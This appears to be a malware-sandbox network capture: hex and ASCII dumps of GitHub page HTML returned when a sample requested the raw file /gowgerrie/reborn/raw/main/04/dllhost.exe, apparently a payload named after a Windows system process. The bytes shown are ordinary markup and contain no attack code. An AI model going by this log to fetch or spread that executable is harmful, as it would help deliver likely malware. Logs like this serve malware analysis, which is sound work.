                                                                                              2022-08-10 04:46:43 UTC13INData Raw: 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 68 74 2d 38 33 63 32 33 35 2d 64 62 37 39 35 39 62 35 66 66 66 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 75 4e 66 37 63 49 5a 6a 6b 30 6f 52 65 31 71 46 6e 7a 56 50 31 65 46 72 6d 68 51 4b 71 36 31 41 51 70 77 4e 66 67 4d 62 6c 46 4b 47 4e 36 56 4e 7a 69 7a 77 6a 32 55 31 64 78 48 78 66 76 77 7a 75 2f 43 6d 2f 71 65 4b 6b 75 32 4d 75 6a 45 2f 61 75 4c 64 36 67 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f
                                                                                              Data Ascii: ules_github_behaviors_ht-83c235-db7959b5fff9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-uNf7cIZjk0oRe1qFnzVP1eFrmhQKq61AQpwNfgMblFKGN6VNzizwj2U1dxHxfvwzu/Cm/qeKku2MujE/auLd6g==" src="https:/
                                                                                              2022-08-10 04:46:43 UTC14INData Raw: 6a 4a 47 4d 7a 4d 34 4d 7a 4d 69 4c 43 4a 32 61 58 4e 70 64 47 39 79 58 32 6c 6b 49 6a 6f 69 4e 7a 45 34 4e 44 67 77 4e 54 55 33 4e 44 49 33 4e 54 63 77 4f 44 6b 33 4f 53 49 73 49 6e 4a 6c 5a 32 6c 76 62 6c 39 6c 5a 47 64 6c 49 6a 6f 69 5a 6e 4a 68 49 69 77 69 63 6d 56 6e 61 57 39 75 58 33 4a 6c 62 6d 52 6c 63 69 49 36 49 6d 6c 68 5a 43 4a 39 22 20 64 61 74 61 2d 70 6a 61 78 2d 74 72 61 6e 73 69 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 73 69 74 6f 72 2d 68 6d 61 63 22 20 63 6f 6e 74 65 6e 74 3d 22 31 30 66 39 33 36 31 61 61 31 31 63 32 64 33 32 61 61 37 30 63 36 36 31 64 35 62 31 31 31 39 61 36 62 61 64 61 61 36 35 39 64 33 62 61 65 31 34 63 63 31 33 62 31 34 64 37 33 36 61 62 64 34 64 22 20 64 61 74 61 2d 70 6a 61
                                                                                              Data Ascii: jJGMzM4MzMiLCJ2aXNpdG9yX2lkIjoiNzE4NDgwNTU3NDI3NTcwODk3OSIsInJlZ2lvbl9lZGdlIjoiZnJhIiwicmVnaW9uX3JlbmRlciI6ImlhZCJ9" data-pjax-transient="true" /><meta name="visitor-hmac" content="10f9361aa11c2d32aa70c661d5b1119a6badaa659d3bae14cc13b14d736abd4d" data-pja
                                                                                              2022-08-10 04:46:43 UTC16INData Raw: 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 6c 75 69 64 69 63 6f 6e 2e 70 6e 67 22 20 74 69 74 6c 65 3d 22 47 69 74 48 75 62 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 66 62 3a 61 70 70 5f 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 34 30 31 34 38 38 36 39 33 34 33 36 35 32 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 69 74 75 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 31 34 37 37 33 37 36 39 30 35 22 20 2f 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 22 3e 0a 20 20 20 20 20 20 3c 6d
                                                                                              Data Ascii: -icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta property="og:url" content="https://github.com"> <m
                                                                                              2022-08-10 04:46:43 UTC17INData Raw: 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 68 65 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 36 32 30 22 3e 0a 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 67 69 74 68 75 62 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 3a 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 33 33 33 34 37 36 32 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 63 72 65 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 67 69 74 68 75 62 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 63 72 65 61
                                                                                              Data Ascii: <meta property="og:image:height" content="620"> <meta property="twitter:site" content="github"> <meta property="twitter:site:id" content="13334762"> <meta property="twitter:creator" content="github"> <meta property="twitter:crea
                                                                                              2022-08-10 04:46:43 UTC18INData Raw: 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 63 6b 3d 22 72 65 6c 6f 61 64 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 70 6a 61 78 2d 63 73 73 2d 76 65 72 73 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 30 32 30 65 35 30 34 30 64 66 64 62 62 33 36 36 30 36 65 62 64 63 65 65 35 62 34 31 32 62 31 39 63 64 37 66 30 39 36 36 39 33 64 65 30 64 31 33 63 66 61 39 36 39 32 39 36 38 36 66 33 65 32 63 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 63 6b 3d 22 72 65 6c 6f 61 64 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 70 6a 61 78 2d 6a 73 2d 76 65 72 73 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 31 39 34 63 64 34 63 34 62 34 63 38 32 36 66 38 65 63 31 35 30 31 37 36 37 31 34 34 38 34 64 33 38 32 33 31 37 31
                                                                                              Data Ascii: data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="020e5040dfdbb36606ebdcee5b412b19cd7f096693de0d13cfa96929686f3e2c" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="194cd4c4b4c826f8ec150176714484d3823171
                                                                                              2022-08-10 04:46:43 UTC20INData Raw: 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 63 6c 61 73 73 3d 22 6a 73 2d 73 69 74 65 2d 66 61 76 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 73 76 67 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 65 32 33 32 37 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65
                                                                                              Data Ascii: e="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"><meta name="theme-color" content="#1e2327"><meta name
                                                                                              2022-08-10 04:46:43 UTC21INData Raw: 32 33 31 61 39 38 35 32 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 43 65 6a 57 4e 31 77 2f 51 6a 62 4f 47 35 45 48 31 66 68 4e 79 50 6b 50 70 67 34 6e 49 6e 6e 70 72 54 41 4c 47 45 61 6f 78 39 45 6c 75 31 62 63 57 32 7a 45 6f 58 2b 66 45 4c 43 5a 41 42 52 65 34 2f 63 6d 76 2b 36 54 6e 61 2f 35 4f 49 70 78 73 58 64 36 2b 41 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 73 65 73
                                                                                              Data Ascii: 231a98525.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-CejWN1w/QjbOG5EH1fhNyPkPpg4nInnprTALGEaox9Elu1bcW2zEoX+fELCZABRe4/cmv+6Tna/5OIpxsXd6+A==" src="https://github.githubassets.com/assets/ses
                                                                                              2022-08-10 04:46:43 UTC22INData Raw: 20 30 20 31 2e 30 37 2d 2e 30 31 20 31 2e 39 33 2d 2e 30 31 20 32 2e 32 20 30 20 2e 32 31 2e 31 35 2e 34 36 2e 35 35 2e 33 38 41 38 2e 30 31 33 20 38 2e 30 31 33 20 30 20 30 30 31 36 20 38 63 30 2d 34 2e 34 32 2d 33 2e 35 38 2d 38 2d 38 2d 38 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 2f 61 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 6c 67 2d 6e 6f 6e 65 20 63 73 73 2d 74 72 75 6e 63 61 74 65 20 63 73 73 2d 74 72 75 6e 63 61 74 65 2d 74 61 72 67 65 74 20 77 69 64 74 68 2d 66 69 74 20 70 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 0a 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63
                                                                                              Data Ascii: 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> </a> <div class="d-lg-none css-truncate css-truncate-target width-fit p-2"> </div> <div class="d-flex flex-items-c
                                                                                              2022-08-10 04:46:43 UTC24INData Raw: 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 74 68 72 65 65 2d 62 61 72 73 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 20 32 2e 37 35 41 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 37 35 20 32 68 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 31 30 20 31 2e 35 48 31 2e 37 35 41 2e 37 35 2e 37 35 20 30 20 30 31 31 20 32 2e 37 35 7a 6d 30 20 35 41 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 37 35 20 37 68 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 31 30 20 31 2e 35 48 31 2e 37 35 41 2e 37 35 2e 37 35 20 30 20 30 31 31 20 37 2e 37 35 7a 4d 31 2e 37 35 20 31 32 61 2e 37 35 2e 37 35 20 30 20 31 30 30 20 31 2e 35 68 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 30 30 2d 31 2e 35 48 31
                                                                                              Data Ascii: ass="octicon octicon-three-bars"> <path fill-rule="evenodd" d="M1 2.75A.75.75 0 011.75 2h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 2.75zm0 5A.75.75 0 011.75 7h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 7.75zM1.75 12a.75.75 0 100 1.5h12.5a.75.75 0 100-1.5H1
                                                                                              2022-08-10 04:46:43 UTC25INData Raw: 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 20 62 6f 72 64 65 72 2d 6c 67 2d 62 6f 74 74 6f 6d 2d 30 20 64 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 66 6c 65 78 20 66 6c 65 78 2d 6c 67 2d 6e 6f 77 72 61 70 20 66 6c 65 78 2d 6c 67 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 3c 64 65 74 61 69 6c 73 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 65 74 61 69 6c 73 20 64 65 74 61 69 6c 73 2d 6f 76 65 72 6c 61 79 20 64 65 74 61 69 6c 73 2d 72 65 73 65 74 20 77 69 64 74 68 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 3c 73 75 6d 6d 61 72 79 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 73 75 6d 6d 61 72 79 20 48 65 61 64 65 72 4d 65 6e 75 2d 6c 69 6e 6b 20 70 78 2d 30 20 70 79 2d 33 20 62 6f 72 64 65 72 2d 30 20 6e 6f 2d 77 72 61 70 20 64
                                                                                              Data Ascii: order-bottom border-lg-bottom-0 d-block d-lg-flex flex-lg-nowrap flex-lg-items-center"> <details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d
                                                                                              2022-08-10 04:46:43 UTC26INData Raw: 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 64 6c 6c 68 6f 73 74 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 4d 6f 62 69 6c 65 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 6d 6f 62 69 6c 65 22 3e 0a 20 20 20 20 20 20 4d 6f 62 69 6c 65 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76
                                                                                              Data Ascii: ;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/dllhost.exe;ref_cta:Mobile;&quot;}" href="/mobile"> Mobile</a> </li> <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--secondary py-2" data-analytics-ev
                                                                                              2022-08-10 04:46:43 UTC28INData Raw: 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 6f 64 75 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f
                                                                                              Data Ascii: </li> <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Product&quot;,&quot;action&quot;:&quot;click to go to
                                                                                              2022-08-10 04:46:43 UTC29INData Raw: 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 6f 64 75 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 49 73 73 75 65 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 64 6c 6c 68 6f 73 74 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 49 73 73 75 65 73 3b
                                                                                              Data Ascii: --secondary py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Product&quot;,&quot;action&quot;:&quot;click to go to Issues&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/dllhost.exe;ref_cta:Issues;
                                                                                              2022-08-10 04:46:43 UTC30INData Raw: 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 6f 64 75 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 47 69 74 48 75 62 20 53 70 6f 6e 73 6f 72 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 64 6c 6c 68 6f 73 74 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 47 69 74 48 75 62 20 53 70 6f 6e 73 6f 72 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 73 70 6f 6e 73 6f 72 73 22 3e 0a 20 20 20 20 20 20 47 69 74 48 75 62 20 53 70 6f 6e 73 6f 72 73 0a
                                                                                              Data Ascii: ;Header dropdown (logged out), Product&quot;,&quot;action&quot;:&quot;click to go to GitHub Sponsors&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/dllhost.exe;ref_cta:GitHub Sponsors;&quot;}" href="/sponsors"> GitHub Sponsors
                                                                                              2022-08-10 04:46:43 UTC32INData Raw: 6c 65 78 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 20 62 6f 72 64 65 72 2d 6c 67 2d 62 6f 74 74 6f 6d 2d 30 20 64 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 66 6c 65 78 20 66 6c 65 78 2d 6c 67 2d 6e 6f 77 72 61 70 20 66 6c 65 78 2d 6c 67 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 6c 69 6e 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 79 2d 33 20 64 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61
                                                                                              Data Ascii: lex-justify-between flex-items-center border-bottom border-lg-bottom-0 d-block d-lg-flex flex-lg-nowrap flex-lg-items-center"> <a class="HeaderMenu-link no-underline py-3 d-block d-lg-inline-block" data-analytics-event="{&quot;category&quot;:&quot;Hea
                                                                                              2022-08-10 04:46:43 UTC33INData Raw: 2d 2d 70 72 69 6d 61 72 79 20 74 65 78 74 2d 62 6f 6c 64 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 45 78 70 6c 6f 72 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 45 78 70 6c 6f 72 65 20 47 69 74 48 75 62 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 64 6c 6c 68 6f 73 74 2e 65 78 65
                                                                                              Data Ascii: --primary text-bold py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Explore&quot;,&quot;action&quot;:&quot;click to go to Explore GitHub&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/dllhost.exe
                                                                                              2022-08-10 04:46:43 UTC34INData Raw: 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 45 78 70 6c 6f 72 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 54 72 65 6e 64 69 6e 67 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 64 6c 6c 68 6f 73 74 2e 65 78 65 3b 72 65 66
                                                                                              Data Ascii: ative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Explore&quot;,&quot;action&quot;:&quot;click to go to Trending&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/dllhost.exe;ref
                                                                                              2022-08-10 04:46:43 UTC36INData Raw: 75 74 29 2c 20 45 78 70 6c 6f 72 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 4f 70 65 6e 20 73 6f 75 72 63 65 20 67 75 69 64 65 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 64 6c 6c 68 6f 73 74 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 4f 70 65 6e 20 73 6f 75 72 63 65 20 67 75 69 64 65 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 67 75 69 64 65 22 3e 0a 20 20 20 20 20 20 4f 70 65 6e 20 73 6f 75 72 63 65 20 67 75 69 64 65 73 0a 3c 2f
                                                                                              Data Ascii: ut), Explore&quot;,&quot;action&quot;:&quot;click to go to Open source guides&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/dllhost.exe;ref_cta:Open source guides;&quot;}" href="https://opensource.guide"> Open source guides</
                                                                                              2022-08-10 04:46:43 UTC37INData Raw: 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 45 78 70 6c 6f 72 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 43 6f 6d 6d 75 6e 69 74 79 20 66 6f 72 75 6d 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 64 6c 6c 68 6f 73 74 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 43 6f 6d 6d 75 6e 69 74 79 20 66 6f 72 75 6d 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e
                                                                                              Data Ascii: ategory&quot;:&quot;Header dropdown (logged out), Explore&quot;,&quot;action&quot;:&quot;click to go to Community forum&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/dllhost.exe;ref_cta:Community forum;&quot;}" href="https://github.
                                                                                              2022-08-10 04:46:43 UTC38INData Raw: 64 65 72 2d 62 6f 74 74 6f 6d 20 62 6f 72 64 65 72 2d 6c 67 2d 62 6f 74 74 6f 6d 2d 30 20 64 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 66 6c 65 78 20 66 6c 65 78 2d 6c 67 2d 6e 6f 77 72 61 70 20 66 6c 65 78 2d 6c 67 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 6c 69 6e 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 79 2d 33 20 64 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 6d 65 6e 75 20 74 6f 70 20 69 74 65 6d 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 26 71 75 6f 74 3b 2c 26 71 75 6f
